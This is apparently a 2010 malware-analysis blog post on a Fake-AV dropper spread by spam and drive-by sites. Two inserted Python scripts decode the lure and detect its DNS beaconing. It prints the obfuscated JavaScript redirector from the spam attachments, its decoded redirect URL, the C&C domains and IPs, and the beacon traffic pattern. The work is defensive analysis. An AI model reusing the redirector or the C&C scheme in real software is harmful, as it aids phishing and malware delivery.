During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).
I first saw the Trojan on 2010-06-08 being dropped by a well-known exploit kit called NeoSploit. The AV detection rate is pretty good: most AV vendors currently detect the binaries used to spread the Trojan as Fake-AV. As far as I have seen, this Trojan is just a dropper which drops additional Fake-AV software.
Back in June, when I first saw the Trojan, I added a signature to AMaDa. Hence AMaDa tags the binaries and URLs associated with this Trojan as DNSTrojan.
In September 2010 I saw a peak on AMaDa in new URLs propagating DNSTrojan:
Over the past days I've seen dozens of domain names popping up which are being used to spread the Trojan (using drive-by exploits). Here are some of them:
As already mentioned, the Trojan is only used to drop Fake-AV software. So far I've identified the following domain names associated with this Fake-AV campaign:
*** Spam Mails propagating the DNSTrojan ***
This week I found dozens of spam mails in my honeypots which had an HTML file attached. Some of the subjects I've seen so far are:
- Consultation Appointment
- Questions
- Outstanding invoice – 9386 Ltd
- Nivea commercial payment
- Appraisal – Killington $155000
- Re: GO HOME + SHE SAID / 4.3.2.1./
- Transaction Breakdown
- Offer on Killington
- Fwd: Addendum to extend close of escrow!
- Signatures to Intercreditor
- demands for payment
- Mortgage Breakdown PITI
- notes from last week
- and many more…
The HTML files attached to all those spam mails contain JavaScript code:
<script type='text/javascript'>
<!--
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';}
else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1);
}}document.write(m);//-->
</script>
Hmm, obfuscated JavaScript code. If we decode it, the following HTML code appears:
<meta http-equiv="refresh" content="0;url=http://blacklefilm.com/x.html" />
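As an added example that is not part of the original post, the following Python script re-implements the decoding loop from the attachment so an analyst can recover the redirect target offline without rendering the HTML in a browser. The function names, the sample attachment wrapper and the use of a regex to pull out the var s assignment are my assumptions; the obfuscated string itself is the one shown above.

```python
import re
from typing import Optional

# Obfuscated string copied from the attachment shown above.
OBFUSCATED = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?"

# Constructed sample of a whole attachment, wrapping the script from the post.
SAMPLE_ATTACHMENT = """<html><body>
<script type='text/javascript'>
<!--
var s="%s";
m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';}
else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1);
}}document.write(m);//-->
</script>
</body></html>""" % OBFUSCATED


def decode_shifted(s: str) -> str:
    """Mirror the attachment's loop: code 28 -> '&', code 23 -> '!', else chr(code - 1)."""
    out = []
    for ch in s:
        code = ord(ch)
        if code == 28:
            out.append("&")
        elif code == 23:
            out.append("!")
        else:
            out.append(chr(code - 1))
    return "".join(out)


# Matches the var s="..." assignment that carries the payload (assumed layout).
_VAR_S = re.compile(r'var\s+s\s*=\s*"([^"]*)"')


def extract_redirect(attachment_html: str) -> Optional[str]:
    """Return the URL the decoded <meta refresh> points at, or None if absent."""
    m = _VAR_S.search(attachment_html)
    if not m:
        return None
    decoded = decode_shifted(m.group(1))
    url = re.search(r'url=([^"\s]+)', decoded)
    return url.group(1) if url else None
```

Feeding the decoded redirect target into a blocklist or a sandbox fetch is safer than opening the attachment, since the decoder never evaluates the script.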
The JavaScript code embedded in the malicious attachment redirects the victim to a hijacked website which displays the following message in the web browser:
So far I've seen the following hijacked websites involved in this spam campaign:
The hijacked website tries to do two things:
- Install the ZeuS banking Trojan using drive-by exploits (see AMaDa)
- Redirect the victim once again to a site controlled by the cybercriminals to distribute DNSTrojan
The HTML source code of the hijacked websites (x.html) looks like this:
Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to convince the victim that his computer is infected with malware and offers him a malicious EXE file:
The binary served by those websites contains the DNSTrojan and is detected as "Fake-AV" by most AV vendors:
File size: 169984 bytes
MD5: a00b75b0d43702d4b099548b90c715c7
SHA1: 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33/43 (76.7%)
As of 2010-09-21 19:00 UTC, the spam campaign is still going on.
*** The DNSTrojan ***
Let's take a closer look at the Trojan being dropped. The Trojan installs itself into the following directories:
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c:\program files\common files\microsoft shared\TextConv\quillmsconv97.exe
Note that the file names used by the Trojan vary. Additionally, the Trojan has an interesting behavior when Apple QuickTime is installed on the victim's computer: it installs itself into the QuickTime directory:
c:\program files\apple software update\softwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c:\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe
In the next step the Trojan contacts its first Command&Control server, which is located at httpdsconfig.com. The interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in this first stage:
(Packet capture: Standard query response TXT)
The Trojan does a DNS TXT query to httpdsconfig.com every few minutes, using the current UNIX timestamp as subdomain (*unixtimestamp*.httpdsconfig.com). The C&C server replies with an encrypted string (which seems to be always the same):
a0dfe9b34e6c3bc167fc890a20dc283ab8c397eed489f2f737efceb0064fbba77dc71472b59dde25a2f6f1883ffdc3b1f5ec91caf610f02c3b85e8cb831f81e554a83706c8849dd4cfa9ef0c205c87f5e93f7a5323e71e35d566fe9fc8916717f69304
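As an added example that is not part of the original post, the following Python script detects the DNS beaconing pattern described above in constructed BIND-style query log lines: a TXT query whose leftmost label is a UNIX timestamp close to the time the query was logged. The function names, the log format and the client addresses are assumptions; it also goes beyond the post by flagging the pattern under any parent domain, not only httpdsconfig.com.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Assumed BIND-style query log layout: "<ts> client <ip>#<port>: query: <qname> IN <qtype> ..."
LOG_LINE = re.compile(
    r'^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) client (?P<client>[\d.]+)#\d+: '
    r'query: (?P<qname>\S+) IN (?P<qtype>\w+) ')

# Constructed sample log lines (documentation IPs, not real traffic).
SAMPLE_LOG = """\
21-Sep-2010 18:58:03.101 client 192.0.2.10#51123: query: 1285095483.httpdsconfig.com IN TXT + (192.0.2.1)
21-Sep-2010 18:58:04.220 client 192.0.2.11#40011: query: www.example.com IN A + (192.0.2.1)
21-Sep-2010 19:01:05.415 client 192.0.2.10#51124: query: 1285095665.httpdsconfig.com IN TXT + (192.0.2.1)
21-Sep-2010 19:02:11.007 client 192.0.2.12#53000: query: 1285095731.example.net IN TXT + (192.0.2.1)
21-Sep-2010 19:04:09.803 client 192.0.2.10#51125: query: 1285095849.httpdsconfig.com IN TXT + (192.0.2.1)
"""

MAX_SKEW = 600  # seconds; the label must be "now" as seen by the infected host


def is_timestamp_beacon(qname: str, qtype: str, log_epoch: int) -> bool:
    """True for a TXT query whose first label is a UNIX timestamp near the log time."""
    if qtype != "TXT":
        return False
    first, _, rest = qname.partition(".")
    if not rest or not first.isdigit() or not 9 <= len(first) <= 10:
        return False
    return abs(int(first) - log_epoch) <= MAX_SKEW


def find_beacons(log_text: str) -> dict:
    """Map each beaconing client to a list of (log_epoch, parent_domain) hits."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        stamp = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f").replace(tzinfo=timezone.utc)
        log_epoch = int(stamp.timestamp())
        if is_timestamp_beacon(m["qname"], m["qtype"], log_epoch):
            parent = m["qname"].split(".", 1)[1].rstrip(".")
            hits[m["client"]].append((log_epoch, parent))
    return dict(hits)
```

Repeated hits from one client a few minutes apart, as in the sample, are the signal to pivot on; a single stray match is worth checking before acting.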
Afterwards the Trojan resolves the domain name desktopsecuritysolutionnew.com and contacts a second C&C server located at httpsxy.in. This time the Trojan uses HTTP to communicate with the C&C:
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: httpsxy.in
The C&C server answers with an HTTP 404 (Not Found), but the response contains encrypted data anyway. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
*encrypted-data*
Last but not least, the Trojan queries a third C&C server located at httpsbee.in every 30 seconds:
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: httpsbee.in
Note that the p string is a base64-encoded string containing the values "MACHINE", "OP" and "TRK".
*** Conclusion ***
- The Trojan is pretty new (first seen in June 2010)
- The detection rate on the Trojan binaries is currently pretty good
- The Trojan uses DNS and HTTP to communicate with the C&C
- The Trojan drops Fake-AV software (using "getfile.php")
I recommend blocking access to the following domain names associated with DNSTrojan:
httpsbee.in (204.12.223.186 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsxy.in (69.197.147.188 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpssite.in -